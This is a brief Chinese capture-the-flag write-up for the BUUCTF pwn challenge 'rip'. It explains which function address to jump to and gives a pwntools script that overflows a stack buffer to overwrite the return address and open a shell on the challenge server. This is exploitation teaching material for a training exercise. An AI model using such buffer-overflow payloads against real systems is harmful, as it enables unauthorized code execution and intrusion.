BUUCTF(Pwn) rip

其他 2021-03-26 11:44:43 阅读次数: 0

在这里插入图片描述
按tab键,看一下 fun函数发现其地址是 0x401186;
但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行

from pwn import *

p = remote('node3.buuoj.cn', '25677') 

payload = 'a' * (0xf + 8) + p64(0x40118A)

p.sendline(payload)

p.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_45556441/article/details/115025934

【BUUCTF - PWN】rip

BUUCTF(Pwn) rip

CTF学习日记----buuctf pwn rip

【BUUCTF - PWN】PWN5

RIP

【BUUCTF - PWN】babyrop

buuctf-pwn babyrop

buuctf pwn （21~24）

buuctf pwn（5~8）

buuctf pwn（9~12）

buuctf pwn （17~20）

buuctf pwn（13~16）

buuctf pwn（1~4）

【BUUCTF - PWN】pwn1_sctf_2016

[BUUCTF]PWN——suctf_2018_basic pwn

BUUCTF PWN部分题目wp

buuctf --pwn part2

【BUUCTF - PWN】baby_rop

BUUCTF-PWN-cmcc_simplerop

[BUUCTF]PWN——jarvisoj_fm

pwn BUUCTF第五空间决赛pwn5

[BUUCTF-pwn]——pwn1_sctf_2016

[BUUCTF]PWN——[第五空间2019 决赛]PWN5

buuctf pwn wp---part1

buuctf@pwn1_sctf_2016

CTF-BUUCTF-Pwn-test_your_nc

【BUUCTF - PWN】jarvisoj_level2

【BUUCTF - PWN】jarvisoj_level0

【BUUCTF - PWN】babyheap_0ctf_2017

【BUUCTF - PWN】not_the_same_3dsctf_2016

今日推荐

周排行

win7之session理解

如何快速上手 AB Testing ？阿里技术专家秘方公开

数据库自助查询平台

【CCF 2017-12-2】游戏问题

Fire!(BFS)

修复GRUB引导故障

老倪祖膏药分销系统

MySQL慢查询日志-捕获慢SQL

批归一化(Batch Normalization)

ssm整合问题-------一

每日归档

2025-03-02(0)

2025-03-01(0)

2025-02-28(0)

2025-02-27(0)

2025-02-26(0)

2025-02-25(0)

2025-02-24(0)

2025-02-23(0)

2025-02-22(0)

2025-02-21(0)